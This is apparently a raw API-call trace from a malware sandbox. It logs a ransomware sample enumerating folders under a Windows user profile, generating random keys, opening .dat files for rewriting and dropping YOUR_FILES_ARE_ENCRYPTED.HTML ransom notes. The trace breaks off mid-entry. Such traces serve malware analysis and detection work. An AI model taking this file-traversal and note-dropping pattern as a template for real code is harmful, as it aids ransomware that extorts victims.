FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x24e76fac, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2e341fb2, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.811] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.811] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.811] GetProcessHeap () returned 0x600000 [0118.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209809\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.812] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.812] CloseHandle (hObject=0x214) returned 1 [0118.812] GetProcessHeap () returned 0x600000 [0118.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.812] GetProcessHeap () returned 0x600000 [0118.813] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.813] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2aaa5c64, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2aaa5c64, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="209857", cAlternateFileName="")) returned 1 [0118.813] StrStrIW (lpFirst="209857", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.813] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857") returned 152 [0118.813] GetProcessHeap () returned 0x600000 [0118.813] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.813] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857" [0118.813] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\*" [0118.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2aaa5c64, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2aaa5c64, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.813] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2aaa5c64, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2aaa5c64, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.813] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x151d75c6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x151d75c6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x153086e5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2d0a, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613045942", cAlternateFileName="161304~1")) returned 1 [0118.813] StrStrIW (lpFirst="1613045942", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.813] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\1613045942") returned 163 [0118.813] PathFindExtensionW (pszPath="1613045942") returned="" [0118.813] lstrlenW (lpString="") returned 0 [0118.813] PathFindExtensionW (pszPath="1613045942") returned="" [0118.813] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x772f065b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e32858f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.813] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.813] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\eventbeacons.dat") returned 169 [0118.813] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.813] lstrlenW (lpString=".dat") returned 4 [0118.813] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.813] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209857\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.814] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.814] CloseHandle (hObject=0x338) returned 1 [0118.814] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x772f065b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e32103b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.814] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.814] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\imprbeacons.dat") returned 168 [0118.814] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.814] lstrlenW (lpString=".dat") returned 4 [0118.814] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.814] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209857\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.814] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.815] CloseHandle (hObject=0x338) returned 1 [0118.815] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772f065b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x772f065b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e32103b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.815] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.815] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.815] GetProcessHeap () returned 0x600000 [0118.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209857\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209857\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.815] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.817] CloseHandle (hObject=0x214) returned 1 [0118.817] GetProcessHeap () returned 0x600000 [0118.817] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.817] GetProcessHeap () returned 0x600000 [0118.817] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.817] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98dc3f87, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98dc3f87, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="210469", cAlternateFileName="")) returned 1 [0118.817] StrStrIW (lpFirst="210469", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.817] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469") returned 152 [0118.817] GetProcessHeap () returned 0x600000 [0118.817] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.817] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469" [0118.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\*" [0118.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98dc3f87, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98dc3f87, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.817] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98dc3f87, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98dc3f87, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.817] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x738d3122, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x738d3122, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x738d3122, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xd4b4, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613044382", cAlternateFileName="161304~1")) returned 1 [0118.817] StrStrIW (lpFirst="1613044382", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.817] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1613044382") returned 163 [0118.817] PathFindExtensionW (pszPath="1613044382") returned="" [0118.818] lstrlenW (lpString="") returned 0 [0118.818] PathFindExtensionW (pszPath="1613044382") returned="" [0118.818] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97553dd9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0e3481, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.818] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.818] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\eventbeacons.dat") returned 169 [0118.818] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.818] lstrlenW (lpString=".dat") returned 4 [0118.818] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.818] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.818] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.818] CloseHandle (hObject=0x338) returned 1 [0118.818] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98d9db87, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0df9c6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.818] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.818] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\imprbeacons.dat") returned 168 [0118.818] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.819] lstrlenW (lpString=".dat") returned 4 [0118.819] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.819] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.819] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.819] CloseHandle (hObject=0x338) returned 1 [0118.819] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98d9db87, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0df9c6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.819] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.819] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.820] GetProcessHeap () returned 0x600000 [0118.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.820] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.822] CloseHandle (hObject=0x214) returned 1 [0118.822] GetProcessHeap () returned 0x600000 [0118.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.822] GetProcessHeap () returned 0x600000 [0118.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.822] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a33918c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9a33918c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="210509", cAlternateFileName="")) returned 1 [0118.822] StrStrIW (lpFirst="210509", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.822] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509") returned 152 [0118.822] GetProcessHeap () returned 0x600000 [0118.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.822] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509") 